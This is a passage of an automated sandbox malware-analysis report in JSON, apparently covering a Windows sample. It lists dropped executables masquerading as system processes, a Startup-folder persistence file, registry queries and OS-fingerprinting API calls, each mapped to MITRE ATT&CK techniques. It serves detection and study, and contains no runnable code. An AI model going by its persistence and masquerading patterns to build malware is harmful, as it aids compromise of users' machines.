\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" writes file \"c:\\xk.exe\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" writes file \"c:\\windows\\system32\\shell.exe\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" writes file \"c:\\windows\\system32\\mig2.scr\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" writes file \"c:\\windows\\system32\\iexplorer.exe\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" writes file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\empty.pif\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\winlogon.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"xk.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\xk.exe]- [targetUID: 00000000-00005328]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\XK\\New Folder.exe]- [targetUID: 00000000-00005328]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\shell.exe]- [targetUID: 00000000-00005328]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\IExplorer.exe]- [targetUID: 00000000-00005328]\n \"xk.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\xk.exe]- [targetUID: 00000000-00005328]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\Data %OSUSER%.exe]- [targetUID: 00000000-00005328]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif]- [targetUID: 00000000-00005328]\n \"mapisvc.inf\" has type \"Unicode text UTF-16 little-endian text with CRLF line terminators\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00005328]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00005328]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00005328]\n \"Mig2.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\Mig2.scr]- [targetUID: 00000000-00005328]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00005328]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00005328]\n \"Folder.htt\" has type \"HTML document ASCII text with CRLF line terminators\"- Location: [C:\\XK\\Folder.htt]- [targetUID: 00000000-00005328]\n \"_1C306CB1-771E-4B4B-A902-86E897877F5B_.png\" has type \"PNG image data 16 x 16 8-bit/color RGB non-interlaced\"- [targetUID: N/A]\n \"Stream_ConversationPrefs_2_3E0178D0DAF4F7498AEB469B68E04572.dat\" has type \"XML 1.0 document ASCII text with CRLF line terminators\"- [targetUID: N/A]\n \"firstrun.log\" has type \"ASCII text with CRLF line terminators\"- [targetUID: N/A]\n \"XK.EXE.67E3CBAF.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67E3CBB1.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-55", "type": 8, "relevance": 3, "name": "Drops a Windows setup information (INF) file", "description": "\"mapisvc.inf\" has type \"Unicode text UTF-16 little-endian text with CRLF line terminators\"", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-39", "type": 8, "relevance": 1, "name": "Drops XML files", "description": "\"Stream_ConversationPrefs_2_3E0178D0DAF4F7498AEB469B68E04572.dat\" has type \"XML 1.0 document ASCII text with CRLF line terminators\"", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" connecting to \"\\ThemeApiPort\"\n \"xk.exe\" connecting to \"\\ThemeApiPort\"\n \"IExplorer.exe\" connecting to \"\\ThemeApiPort\"\n \"CSRSS.EXE\" connecting to \"\\ThemeApiPort\"\n \"SMSS.EXE\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched file \"C:\\Windows\\system32\\en\\KERNELBASE.dll.mui\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched file \"C:\\Windows\\xk.exe\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched file \"C:\\Windows\\System32\\shell.exe\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched file \"C:\\Windows\\System32\\Mig2.scr\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched file \"C:\\Windows\\System32\\IExplorer.exe\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\"\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" queries basic process information of the \"C:\\share\\XK\\Folder.htt\" (UID: 5328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" queries basic process information of the \"C:\\Windows\\System32\\tzres.dll\" (UID: 5328)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{0006F03A-0000-0000-C000-000000000046}\\LOCALSERVER32\"; Key: \"\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTNAME\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTBIAS\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTSTART\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"TIMEZONEKEYNAME\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DYNAMICDAYLIGHTTIMEDISABLED\"; Value: \"\")\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"ACTIVETIMEBIAS\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4354312'}\" (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4354344'}\" (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4354360'}\" (UID: 00000000-00005328)\n \"xk.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4354312'}\" (UID: 00000000-00003688)\n \"xk.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4354344'}\" (UID: 00000000-00003688)\n \"xk.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4354360'}\" (UID: 00000000-00003688)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4354312'}\" (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4354344'}\" (UID: 00000000-00004256)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4354360'}\" (UID: 00000000-00004256)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4354312'}\" (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4354344'}\" (UID: 00000000-00005476)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4354360'}\" (UID: 00000000-00005476)\n \"SERVICES.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4354312'}\" (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4354344'}\" (UID: 00000000-00001968)\n \"SERVICES.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4354360'}\" (UID: 00000000-00001968)\n \"LSASS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4354312'}\" (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4354344'}\" (UID: 00000000-00003760)\n \"LSASS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4354360'}\" (UID: 00000000-00003760)\n \"SMSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4354312'}\" (UID: 00000000-00005196)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059d07798010000a0010000fa1b6100f81b61000016610000005e00e414610088000000880000001768d077c0176100ff2bd077337eec77cc1b6100ac011b0000001b0000005e00c06d5e0013009d00fb040000c06d5e0078166100100000000000000014009800fb040000c06d5e00 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebe67740c61f0000c0fd7f9a5cd17700f0fd7f08c6120044c0fd7f00000000400000003f0000001f00000000c0fd7ffcc51200c15cd1776082d8771f00000000c0fd7f9a5cd17700f0fd7f20c612005789d0778083d8771317d775d8ebe677 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000f01ae66808000000c41ae668b59c8b7c02000000d41ce66800001300e616e668189b6300089b6300c8d21200d0f0e76888d3120053afe76881547f14feffffffc41ae668421ae668e616e6681cd31200d91be668e616e66867c12a76ae05da757457da750000000000000000cc92d675 (UID: 00000000-00005328)\n \"xk.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059d07798010000a0010000fa1b5501f81b55010016550100005201e414550188000000880000001768d077c0175501ff2bd077a369ec77cc1b5501ac0162000000620000005201c06d52011000ac003c040000c06d52017816550110000000000000001100a7003c040000c06d5201 (UID: 00000000-00003688)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059d07798010000a0010000fa1b3a01f81b3a0100163a0100003701e4143a0188000000880000001768d077c0173a01ff2bd0771d58ec77cc1b3a01ac0125000000250000003701c06d370114009800f1010000c06d370178163a01100000000000000015009300f1010000c06d3701 (UID: 00000000-00004256)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059d07798010000a0010000fa1bdd01f81bdd010016dd010000da01e414dd0188000000880000001768d077c017dd01ff2bd0779c5fec77cc1bdd01ac011700000017000000da01c06dda011200a2006f010000c06dda017816dd01100000000000000013009d006f010000c06dda01 (UID: 00000000-00005476)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059d07798010000a0010000fa1be601f81be6010016e6010000e301e414e60188000000880000001768d077c017e601ff2bd0777b5dec77cc1be601ac012500000025000000e301c06de30114009800f4010000c06de3017816e601100000000000000015009300f4010000c06de301 (UID: 00000000-00001968)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059d07798010000a0010000fa1b4101f81b41010016410100003e01e414410188000000880000001768d077c0174101ff2bd077bf56ec77cc1b4101ac011b0000001b0000003e01c06d3e0114009800f2010000c06d3e0178164101100000000000000015009300f2010000c06d3e01 (UID: 00000000-00003760)\n \"SMSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100775059d07798010000a0010000fa1b5700f81b57000016570000005400e414570088000000880000001768d077c0175700ff2bd0776655ec77cc1b5700ac011f0000001f0000005400c06d54001200a200fb040000c06d540078165700100000000000000013009d00fb040000c06d5400 (UID: 00000000-00005196)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"GetLocaleInfoA\" with parameter \"1033\" - (UID: 00000000-00005328)\n \"xk.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003688)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004256)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005476)\n \"SERVICES.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00001968)\n \"LSASS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003760)\n \"SMSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005196)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000009872f0156100eea3a072001661000300000058fa1d00609ba0720c1661007d9ba072328a9a72d8f51e0097a8a072030000000000000078f51e0058fa1d000816610094f9120094f912003ff29872f0156100c3a5a0720016610058fa1d00c0e5967278f51e0034000000f81b610000005e00e02f6100c0e59672d8f91200dcf9120000000000490200009cfa120034000000340000001768d077001c610000000000435cd077f77fec770016610024035e0000005e0050015e0093aba07200000000c06d5e005c1561000000000058fa1d004902000000fa120050015e00b7aba072 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001b000cda1200b344b16c050000000000000000000000000000000000000000000000000000001401000000000000000000000000000024e11200ac353b02c8de1200c8de12005ecbd5761401000000000000005dd37624e112000e5dd376bcdc1200dcaad776010000000000000072000000ffffffffffffffff44da120078020000000000002500000044da12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360019fc3b1c9cda12006d825a763c9c1f0004010000 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000310035006400660031003700310037006200310037003400330035003300370036003500650031006100380039003800660036003000370035006400640033003000370062003400650061003900610061003900320039006500360032003000330033002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2bd0772340ec77d8ebe677ac011b0000001b00000000000000000026003e000c00000000000000000000000000000000000000270039000c000000000000000000000038701b0000000000200000000000000000000000 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000ffff29003900ca000000620bd5760000000038701b000000000050000000bcda1f0002000000b88f1d000000000001000008f8b21e0060741b00380bd576d0d812000200000084d912003f08507602000000b88f1d00000000000100001888fb4f7674d91200c81cd7764adb120095fb4f76a8da1200b88f1d0000000000000000000000000030da120000001b007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600b5ff3b1cf0d912006d825a763c9c1f0004010000 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036008df43b1c08d312006d825a766488210004010000 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000020005ccf1200b344b16c090000000000000000000000000000000000000000000000000000003801000000000000000000000000000074d612001c233b0218d4120018d412005ecbd5763801000000000000005dd37674d612000e5dd3760cd21200dcaad77601000000000000007a000000ffffffffffffffff94cf120078020000000000002500000094cf12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600a9e93b1ceccf12006d825a762c8e210004010000 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002100003b000000001b00000000004090210050cf12000464d07738011b00e063d07702000000b88f1d00000000000100000814ce120000000001bcc7d877c0c7d8770a000000600f000000001b00188e2100f83b0000ff07000000001b00000000007f070000c4001b0008301b003924000000cf120067e5cd7700001b00188e21000000000000001b00000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360045e93b1c40cf12006d825a762c8e210004010000 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002400507c24004b7c2400000000000000000000001b0000000001b4ca12000000000018d8120095e1cc7743972e00feffffff435cd0775059d077aa000000b80000004a7c2400487c24003ccc120074d012000000000000000000000000000000000000000000000000004019000000001b001c5ccf7760d8d675ffffffff17000000eccb12002400000003000000dcd0120008d6120074d012008600000018cc120096edd077727c2400a06aa675860000003ccc120074d012000000000086008800a06aa6753ccc1200916ca675727c2400a06aa675a06aa675acd0120002020000 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000009c0e3b02f0e612009aa19472 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000080298e61200c68d1f00000000000000000000000000c41d610000000000700000005a3a5c446f63756d656e747320616e642053657474696e67735c416c6c2055736572735c5374617274204d656e755c50726f6772616d735c5374617274757000080000000000000080000000fce71200a0281b002202fb7f80000000a0e61200668ad675a0281b00fce71200fce8120068e71200e8e712000000000068e71200c0514000fce71200a0281b00000000000ce7120083bfa0720a000000c0514000fce71200d0e612005fb9a1720a2000000a20400000000000c05140000a204000 (UID: 00000000-00005328)\n \"cc1075b4676f6215df1717b174353765e1a898f6075dd307b4ea9aa929e62033.exe\" called \"RtlGetVersion\" with parameter 